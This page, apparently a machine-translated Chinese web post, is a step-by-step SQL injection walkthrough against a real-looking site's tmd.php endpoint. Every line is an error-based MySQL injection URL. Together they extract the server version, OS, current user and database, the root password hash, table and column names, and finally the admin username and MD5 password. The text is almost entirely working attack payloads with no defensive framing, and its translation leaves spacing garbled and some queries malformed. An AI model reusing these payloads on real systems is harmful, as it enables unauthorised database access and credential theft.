Ps: % 20 in the original text. I replaced it with/**/to facilitate viewing.
Judge version:
Http://www.bkjia.com/tmd. php? Id = 352 & wsid = 1/**/and/**/(1, 1) % 3E (select/**/count (*), concat (select/**/@ version/**/), 0x3a, floor (rand () * 2 )) /**/x/**/from/**/(select/**/1/**/union/**/select/**/2) /**/a/**/group/**/by/**/x/**/limit/**/1) % 23
Judgment System
Http://www.bkjia.com/tmd. php? Id = 352 & wsid = 1/**/and/**/(1, 1) % 3E (select/**/count (*), concat (select/**/@ version_compile_ OS/**/), 0x3a, floor (rand () * 2 )) /**/x/**/from/**/(select/**/1/**/union/**/select/**/2) /**/a/**/group/**/by/**/x/**/limit/**/1) % 23
Current user ()
Http://www.bkjia.com/tmd. php? Id = 352 & wsid = 1/**/and/**/(1, 1) % 3E (select/**/count (*), concat (select/**/user ()/**/), 0x3a, floor (rand () * 2 )) /**/x/**/from/**/(select/**/1/**/union/**/select/**/2) /**/a/**/group/**/by/**/x/**/limit/**/1) % 23
Current database ()
Http://www.bkjia.com/tmd. php? Id = 352 & wsid = 1/**/and/**/(1, 1) % 3E (select/**/count (*), concat (select/**/database ()/**/), 0x3a, floor (rand () * 2 )) /**/x/**/from/**/(select/**/1/**/union/**/select/**/2) /**/a/**/group/**/by/**/x/**/limit/**/1) % 23
Brute-force root hash
Http://www.bkjia.com/tmd. php? Id = 352 & wsid = 1/**/and/**/(1, 1) % 3E (select/**/count (*), concat (select/**/Password/**/from/**/mysql. user/**/where/**/User = char (114,111,111,116), 0x3a, floor (rand () * 2 )) /**/x/**/from/**/(select/**/1/**/union/**/select/**/2) /**/a/**/group/**/by/**/x/**/limit/**/1) % 23
Current Database Table Name
Http://www.bkjia.com/tmd. php? Id = 352 & wsid = 1/**/and/**/(1, 1) % 3E (select/**/count (*), concat (select/**/TABLE_NAME/** // **/from/**/information_schema.tables/**/where/**/TABLE_SCHEMA = char (115,97, 110,115, 97,110, 49)/**/limit/**/6, 1), 0x3a, floor (rand () * 2 )) /**/x/**/from/**/(select/**/1/**/union/**/select/**/2) /**/a/**/group/**/by/**/x/**/limit/**/1) % 23
User_name field of the current database
Http://www.bkjia.com/tmd. php? Id = 352 & wsid = 1/**/and/**/(1, 1) % 3E (select/**/count (*), concat (select/** // **/COLUMN_NAME/**/from/**/information_schema.COLUMNS/**/where/**/TABLE_SCHEMA = char (115,97, 110,115, 97,110, 49)/**/and/**/TABLE_NAME = char (97,100,109,105,110, 99, 115,95, 95,117,115,101,114,)/**/limit/**/), 0x3a, floor (rand () * 2 )) /**/x/**/from/**/(select/**/1/**/union/**/select/**/2) /**/a/**/group/**/by/**/x/**/limit/**/1) % 23
Password of the current database Field
Http://www.bkjia.com/tmd. php? Id = 352 & wsid = 1/**/and/**/(1, 1) % 3E (select/**/count (*), concat (select/** // **/COLUMN_NAME/**/from/**/information_schema.COLUMNS/**/where/**/TABLE_SCHEMA = char (115,97, 110,115, 97,110, 49)/**/and/**/TABLE_NAME = char (97,100,109,105,110, 99, 115,95, 95,117,115,101,114,)/**/limit/**/), 0x3a, floor (rand () * 2 )) /**/x/**/from/**/(select/**/1/**/union/**/select/**/2) /**/a/**/group/**/by/**/x/**/limit/**/1) % 23
Obtain admin passwd (md5)
Http://www.bkjia.com/tmd. php? Id = 352 & wsid = 1/**/and/**/(1, 1) % 3E (select/**/count (*), concat (select/**/concat_ws (char (94), ifnull (cast (% 60 password % 60/**/as/**/char ), char (32), ifnull (cast (% 60user_name % 60/**/as/**/char), char (32 ))) /** // **/from/**/sansan1.ecs _ admin_user/**/limit/**/), 0x3a, floor (rand () * 2 )) /**/x/**/from/**/(select/**/1/**/union/**/select/**/2) /**/a/**/group/**/by/**/x/**/limit/**/1) % 23